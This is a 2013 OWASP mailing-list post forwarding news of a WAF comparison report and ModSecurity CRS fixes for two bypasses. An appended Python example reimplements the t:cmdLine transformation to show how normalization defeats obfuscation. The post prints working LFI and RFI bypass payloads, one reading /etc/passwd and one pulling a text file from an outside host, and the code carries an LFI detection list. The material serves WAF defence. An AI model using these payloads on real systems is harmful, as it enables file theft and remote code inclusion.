[Owasp-brazilian] [Owasp-modsecurity-core-rule-set] CloudFlare vs Incapsula vs ModSecurity (CloudFlare vs Incapsula ModSecurity vs)

firebits mrpa.security at gmail.com
Wed Feb 27 22:20:05 UTC 2013


FYI

From the list [Owasp-modsecurity-core-rule-set] CloudFlare vs Incapsula vs ModSecurity (CloudFlare vs Incapsula ModSecurity vs), by Ryan Barnett:

An interesting report on WAFs:
http://zeroscience.mk/files/wafreport2013.pdf

ModSecurity has the best false negative rate :)

I just updated the GitHub repo with fixes for the 2 LFI/RFI bypasses -

https://github.com/SpiderLabs/owasp-modsecurity-crs/commit/7ff865deab72b0993824ce4ef53189745a4dd1a3

Note that for the LFI issue I applied the t:cmdLine transformation function -

https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-cmdLine

Thanks to Marc Stern for the contribution!

LFI Bypass
http://www.modsecurity.org/demo/phpids?test=cat 20% \ / \ etc / passwd

RFI Bypass
http://www.modsecurity.org/demo/phpids?test=http://dni.destr0y.net/x.txt

Regards,

@firebitsbr
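The forwarded message says the LFI fix applies the t:cmdLine transformation before the rule's pattern is matched. The block below is an added example, written for this page and not code from the message, the CRS repository or ModSecurity itself: it reimplements the cmdLine steps as the ModSecurity Reference Manual describes them (delete backslashes, quotes and carets; turn commas and semicolons into spaces; collapse whitespace; drop the space before a slash or open parenthesis; lowercase) and runs a small constructed LFI fragment list over sample argument values with and without the transformation. The fragment list, the sample values and the function names are assumptions made for the example.

```python
"""
Python reimplementation of ModSecurity's t:cmdLine transformation, used here to
show why a rule that normalizes first catches evasions a raw substring match
misses. Example code for this page, not ModSecurity's own implementation; the
steps follow the transformation's description in the ModSecurity Reference Manual.
"""
import re

# Constructed signature list standing in for an LFI rule's path fragments
# (a real CRS rule carries its own, much longer list).
LFI_PATTERNS = ("/etc/passwd", "/etc/shadow", "../")


def cmdline_normalize(value: str) -> str:
    """Apply the t:cmdLine steps to an already URL-decoded argument value
    (ModSecurity's ARGS collection is URL-decoded before transformations run)."""
    value = re.sub(r'[\\"\'^]', "", value)   # delete backslashes, quotes, carets
    value = re.sub(r"[,;\s]+", " ", value)   # commas, semicolons, whitespace runs -> one space
    value = re.sub(r" (?=[/(])", "", value)  # drop the space before '/' or '(': "cat /etc" -> "cat/etc"
    return value.lower()


def matches_lfi(value: str, normalize: bool) -> bool:
    """True if any LFI fragment appears in value, optionally after t:cmdLine.
    Without normalization only a case-fold is applied, as a naive rule would."""
    haystack = cmdline_normalize(value) if normalize else value.lower()
    return any(fragment in haystack for fragment in LFI_PATTERNS)


# Constructed argument values as ARGS would present them after URL decoding.
# PLAIN is the straightforward form; OBFUSCATED splits the same path with the
# quoting and escape characters a shell discards, so a raw match fails.
PLAIN = "cat /etc/passwd"
OBFUSCATED = "CaT \"/e\"tc\\/pa'ss'wd"

if __name__ == "__main__":
    for sample in (PLAIN, OBFUSCATED):
        print(
            f"{sample!r:28} raw match={matches_lfi(sample, False)!s:5} "
            f"cmdLine match={matches_lfi(sample, True)!s:5} "
            f"normalized={cmdline_normalize(sample)!r}"
        )
```

Running the block shows the obfuscated value failing the raw match and passing once normalized, both forms collapsing to the same `cat/etc/passwd` string. The lesson for rule authors is the one the message implies: write the LFI pattern against the normalized form (note the space before the slash disappears), and apply the same transformation chain in the rule that the attacker's target interpreter effectively applies.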